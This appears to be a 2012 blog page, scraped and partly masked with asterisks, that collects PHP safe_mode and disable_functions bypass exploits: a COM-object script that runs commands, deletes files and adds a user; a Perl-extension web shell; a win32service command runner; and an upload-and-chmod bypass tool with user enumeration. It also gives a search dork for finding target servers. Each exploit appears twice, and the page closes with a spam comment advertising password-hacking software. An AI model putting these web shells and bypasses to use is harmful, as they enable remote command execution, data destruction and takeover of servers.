<?php //PHP 5.x COM functions safe_mode and disable_function bypass
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org
//dork: intitle:phpinfo in****:"php version" +windows (thanks to rgod)
//Tested on xp Pro sp2 full patched, worked both from the cli and on apache
//from: http://www.phpfreaks.com/phpmanual/page/ref.com.html
//Requirements:
//COM functions are only available for the Windows version of PHP.
//.Net support requires PHP 5 and the .Net runtime.
//Installation:
//There is no installation needed to use these functions; they are part of the PHP core. -> (sounds good)
//The windows version of PHP has built in support for this extension. You do not need to
//load any additional extension in order to use these functions.
//You are responsible for installing support for the various COM objects that you intend
//to use (such as MS Word); we don't and can't bundle all of those with PHP.
//mmm... I don't know how many people use Apache and PHP on Windows servers but I suppose there are
//a lot of users if PHP developers decide to implement COM functions as part of PHP core.
//take a look here: intitle:phpinfo in****:"php version" +windows (thanks to rgod).
//Anyway, I think they should take much care on security due to the fact that, through these
//functions, you can seriously compromise a pc.
//For remote execution you need (naturally) to use a server that is MS based,
//e.g. Apache for win configured for working with PHP.
//In this scenario, someone could upload a script and then use it to damnage the server.
//Local execution simply bypass all Windows protections against execution of dangerous
//COM objects (even kill-bit) due to the fact that the script is executed from a client that
//does not check these settings.
//php.ini settings:
//safe_mode = On
//disable_functions = com_load_typelib
//open_basedir = htdocs
//Remote execution requires that open_basedir is disabled $mPath = str_repeat("..\\",20); $compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}'); //this one uses compatUI.dll $compatUI->RunApplication("something", "notepad*****", 1); //to run notepad***** $wscript = new COM('wscript.shell'); //this one uses wscript***** $wscript->Run("cmd***** /c calc*****"); //to run calc***** $FSO = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx $FSO->Open****File($mPath."something.bat", 8, true); //to create a batch file on server... yes, //if you want you can write to this batch file :) $FSOdelFile = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx $FSOdelFile->DeleteFile($mPath."PathToFiles\\*.txt", True); //to delete all files with txt extension $FSOdelFolder = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx $FSOdelFolder->DeleteFolder($mPath."FolderToDelete", True); //to delete an entire folder $shgina = new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}'); //this one uses shgina.dll $shgina->Create("shinnai"); //to add an user :) ?>PHP Perl Extension Safe_mode Bypass
PHP:
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls '; $perl=new perl();
echo "<****area rows='25' cols='75'>"; $perl->eval("system('".$_GET['cmd']."')");
echo "</****area>"; $_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=**** ****=cmd value='".$_GET['cmd']."' size=25></form>" ?>
PHP:
$command=(isset($_GET['CMD']))?$_GET['CMD']:'dir'; #cammand $dir=ini_get('upload_tmp_dir'); #Directory to store command's output if(!extension_loaded('win32service'))die('win32ser vice extension not found!');
$****=$dir."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd*****':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$****\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); $exec=file_get_contents($****); unlink($****);
echo "<pre>".htmlspecialchars($exec)."</pre>"; ?>
کد PHP:
if (!extension_loaded("win32std")) die("win32std extension required!"); system("cmd*****"); //just to be sure that protections work well win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd*****"); ?> PHP < 5.2.5 Safe mode Bypass
PHP:
########################## WwW.BugReport.ir ###########################################
#
# AmnPardaz Security Research & Penetration Testing Group
#
# Title: PHP < 5.2.5 Safe mode Bypass
# Vendor: http://www.php.net/
################################################## ################################
?>
<html dir="ltr">
<head>
****** **********="Content-Type" content="****/html; charset=utf-8">
<title>SAFE MODE BYPASS</title>
<style type="****/css" media="screen">
**** {
font-size: 10px;
font-family: verdana;
}
INPUT {
BORDER-TOP-*****: 1px; FONT-WEIGHT: bold; BORDER-LEFT-*****: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-*****: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #00ff00; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-*****: 1px; BORDER-RIGHT-COLOR: #D50428
}
</style>
</head>
<**** dir="ltr" alink="#00ff00" bgcolor="#000000" link="#00c000" ****="#008000" vlink="#00c000">
<form method="POST" enctype="multipart/form-data" action="?">
Enter The <A href='?info=1' > Target Path </A>:<BR><BR>
<input type="****" ****="target" value="<?php echo $_SERVER['********_ROOT']; ?>" size="50"><BR>*Target must be writeable!<BR><BR>
File Content:<BR><BR>
<input type="file" ****="F1" size="50"><BR><BR>
<input type="submit" ****="Upload" value="Upload">
</form>
<?php
error_reporting(E_ALL ^ E_NOTICE);
if(isset($_GET['info']) && $_GET['info'] == 1)
{
if (function_exists('posix_getpwuid'))
{
if (isset($_POST['f']) && isset($_POST['l']))
{
$f = intval($_POST['f']);
$l = intval($_POST['l']);
while ($f < $l)
{
$uid = posix_getpwuid($f);
if ($uid)
{
$uid["dir"] = "<a href=\"\">".$uid["dir"]."</a>";
echo join(":",$uid)."<br>";
}
$f++;
}
} else
{
echo '
<form method="POST" action="?info=1">Uid
FROM : <input type="****" ****="f" value="1" size="4">
TO : <input type="****" ****="l" value="1000" size="4">
<input type="submit" ****="Show" value="Show">';
}
} else die("Sorry! Posix Functions are disabled in your box, There is no way to obtain users path! You must enter it manually!");
die();
}
if(isset($_POST['Upload']) && isset($_POST['target']) && $_POST['target'] != "")
{
$MyUid = getmyuid();
$MyU**** = get_current_user();
if (function_exists('posix_geteuid'))
{
$HttpdUid = posix_geteuid();
$HttpdInfo = posix_getpwuid($HttpdUid);
$HttpdU**** = "(".$HttpdInfo['****'].")";
} else
{
$NewScript = @fopen('bypass.php','w+');
if (!$NewScript)
{
die('Make the Current directory Writeable (Chmod 777) and try again');
} else $HttpdUid = fileowner('bypass.php');
}
if ($MyUid != $HttpdUid)
{
echo "This Script User ($MyUid) and httpd Process User ($HttpdUid) dont match!";
echo " We Will create a copy of this Script with httpd User $HttpdU****
in current directory..."."<BR>";
if (!$NewScript)
{
$NewScript = @fopen('bypass.php','w+');
if (!$NewScript)
{
die('Make the Current directory Writeable (Chmod 777) and try again');
}
}
$Temp = fopen(__FILE__ ,'r');
while (!feof($Temp))
{
$Buffer = fgets($Temp);
fwrite($NewScript,$Buffer);
}
fclose($Temp);
fclose($NewScript);
echo "Please Run <A href='bypass.php'> This </A> Script";
die();
}
$TargetPath = trim($_POST['target']);
$TargetFile = tempnam($TargetPath,"BP");
if (strstr($TargetFile, $TargetPath) == TRUE)
{
echo $TargetFile." Successfully created!<BR>";
} else die("$TargetPath doesnt exist or is not writeable! choose another path!");
if (move_uploaded_file($_FILES['F1']['tmp_****'], $TargetFile))
{
echo "<BR>$TargetFile is valid, and was successfully uploaded.";
} else
{
die("<BR>$TargetFile Could not upload.");
}
chmod($TargetFile , 0777);
}
?>
PHP:
<?php //PHP 5.x COM functions safe_mode and disable_function bypass
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org
//dork: intitle:phpinfo in****:"php version" +windows (thanks to rgod)
//Tested on xp Pro sp2 full patched, worked both from the cli and on apache
//from: http://www.phpfreaks.com/phpmanual/page/ref.com.html
//Requirements:
//COM functions are only available for the Windows version of PHP.
//.Net support requires PHP 5 and the .Net runtime.
//Installation:
//There is no installation needed to use these functions; they are part of the PHP core. -> (sounds good)
//The windows version of PHP has built in support for this extension. You do not need to
//load any additional extension in order to use these functions.
//You are responsible for installing support for the various COM objects that you intend
//to use (such as MS Word); we don't and can't bundle all of those with PHP.
//mmm... I don't know how many people use Apache and PHP on Windows servers but I suppose there are
//a lot of users if PHP developers decide to implement COM functions as part of PHP core.
//take a look here: intitle:phpinfo in****:"php version" +windows (thanks to rgod).
//Anyway, I think they should take much care on security due to the fact that, through these
//functions, you can seriously compromise a pc.
//For remote execution you need (naturally) to use a server that is MS based,
//e.g. Apache for win configured for working with PHP.
//In this scenario, someone could upload a script and then use it to damnage the server.
//Local execution simply bypass all Windows protections against execution of dangerous
//COM objects (even kill-bit) due to the fact that the script is executed from a client that
//does not check these settings.
//php.ini settings:
//safe_mode = On
//disable_functions = com_load_typelib
//open_basedir = htdocs
//Remote execution requires that open_basedir is disabled $mPath = str_repeat("..\\",20); $compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}'); //this one uses compatUI.dll $compatUI->RunApplication("something", "notepad*****", 1); //to run notepad***** $wscript = new COM('wscript.shell'); //this one uses wscript***** $wscript->Run("cmd***** /c calc*****"); //to run calc***** $FSO = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx $FSO->Open****File($mPath."something.bat", 8, true); //to create a batch file on server... yes, //if you want you can write to this batch file :) $FSOdelFile = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx $FSOdelFile->DeleteFile($mPath."PathToFiles\\*.txt", True); //to delete all files with txt extension $FSOdelFolder = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx $FSOdelFolder->DeleteFolder($mPath."FolderToDelete", True); //to delete an entire folder $shgina = new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}'); //this one uses shgina.dll $shgina->Create("shinnai"); //to add an user :) ?>
PHP Perl Extension Safe_mode Bypass
كود:
<?php
كود:
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls '; $perl=new perl();
echo "<****area rows='25' cols='75'>"; $perl->eval("system('".$_GET['cmd']."')");
echo "</****area>"; $_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=**** ****=cmd value='".$_GET['cmd']."' size=25></form>" ?>
کد PHP:
$command=(isset($_GET['CMD']))?$_GET['CMD']:'dir'; #cammand $dir=ini_get('upload_tmp_dir'); #Directory to store command's output if(!extension_loaded('win32service'))die('win32ser vice extension not found!');
$****=$dir."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd*****':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$****\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); $exec=file_get_contents($****); unlink($****);
echo "<pre>".htmlspecialchars($exec)."</pre>"; ?> PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass
PHP:
if (!extension_loaded("win32std")) die("win32std extension required!"); system("cmd*****"); //just to be sure that protections work well win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd*****"); ?>
PHP:
########################## WwW.BugReport.ir ###########################################
#
# AmnPardaz Security Research & Penetration Testing Group
#
# Title: PHP < 5.2.5 Safe mode Bypass
# Vendor: http://www.php.net/
################################################## ################################
?>
<html dir="ltr">
<head>
****** **********="Content-Type" content="****/html; charset=utf-8">
<title>SAFE MODE BYPASS</title>
<style type="****/css" media="screen">
**** {
font-size: 10px;
font-family: verdana;
}
INPUT {
BORDER-TOP-*****: 1px; FONT-WEIGHT: bold; BORDER-LEFT-*****: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-*****: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #00ff00; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-*****: 1px; BORDER-RIGHT-COLOR: #D50428
}
</style>
</head>
<**** dir="ltr" alink="#00ff00" bgcolor="#000000" link="#00c000" ****="#008000" vlink="#00c000">
<form method="POST" enctype="multipart/form-data" action="?">
Enter The <A href='?info=1' > Target Path </A>:<BR><BR>
<input type="****" ****="target" value="<?php echo $_SERVER['********_ROOT']; ?>" size="50"><BR>*Target must be writeable!<BR><BR>
File Content:<BR><BR>
<input type="file" ****="F1" size="50"><BR><BR>
<input type="submit" ****="Upload" value="Upload">
</form>
<?php
error_reporting(E_ALL ^ E_NOTICE);
if(isset($_GET['info']) && $_GET['info'] == 1)
{
if (function_exists('posix_getpwuid'))
{
if (isset($_POST['f']) && isset($_POST['l']))
{
$f = intval($_POST['f']);
$l = intval($_POST['l']);
while ($f < $l)
{
$uid = posix_getpwuid($f);
if ($uid)
{
$uid["dir"] = "<a href=\"\">".$uid["dir"]."</a>";
echo join(":",$uid)."<br>";
}
$f++;
}
} else
{
echo '
<form method="POST" action="?info=1">Uid
FROM : <input type="****" ****="f" value="1" size="4">
TO : <input type="****" ****="l" value="1000" size="4">
<input type="submit" ****="Show" value="Show">';
}
} else die("Sorry! Posix Functions are disabled in your box, There is no way to obtain users path! You must enter it manually!");
die();
}
if(isset($_POST['Upload']) && isset($_POST['target']) && $_POST['target'] != "")
{
$MyUid = getmyuid();
$MyU**** = get_current_user();
if (function_exists('posix_geteuid'))
{
$HttpdUid = posix_geteuid();
$HttpdInfo = posix_getpwuid($HttpdUid);
$HttpdU**** = "(".$HttpdInfo['****'].")";
} else
{
$NewScript = @fopen('bypass.php','w+');
if (!$NewScript)
{
die('Make the Current directory Writeable (Chmod 777) and try again');
} else $HttpdUid = fileowner('bypass.php');
}
if ($MyUid != $HttpdUid)
{
echo "This Script User ($MyUid) and httpd Process User ($HttpdUid) dont match!";
echo " We Will create a copy of this Script with httpd User $HttpdU****
in current directory..."."<BR>";
if (!$NewScript)
{
$NewScript = @fopen('bypass.php','w+');
if (!$NewScript)
{
die('Make the Current directory Writeable (Chmod 777) and try again');
}
}
$Temp = fopen(__FILE__ ,'r');
while (!feof($Temp))
{
$Buffer = fgets($Temp);
fwrite($NewScript,$Buffer);
}
fclose($Temp);
fclose($NewScript);
echo "Please Run <A href='bypass.php'> This </A> Script";
die();
}
$TargetPath = trim($_POST['target']);
$TargetFile = tempnam($TargetPath,"BP");
if (strstr($TargetFile, $TargetPath) == TRUE)
{
echo $TargetFile." Successfully created!<BR>";
} else die("$TargetPath doesnt exist or is not writeable! choose another path!");
if (move_uploaded_file($_FILES['F1']['tmp_****'], $TargetFile))
{
echo "<BR>$TargetFile is valid, and was successfully uploaded.";
} else
{
die("<BR>$TargetFile Could not upload.");
}
chmod($TargetFile , 0777);
}
?>©2012, copyright BLACK BURN
My brother recommended I might like this blog. He was totally
ReplyDeleteright. This post truly made my day. You can not imagine
just how much time I had spent for this info! Thanks!
My website ... password hacking software ()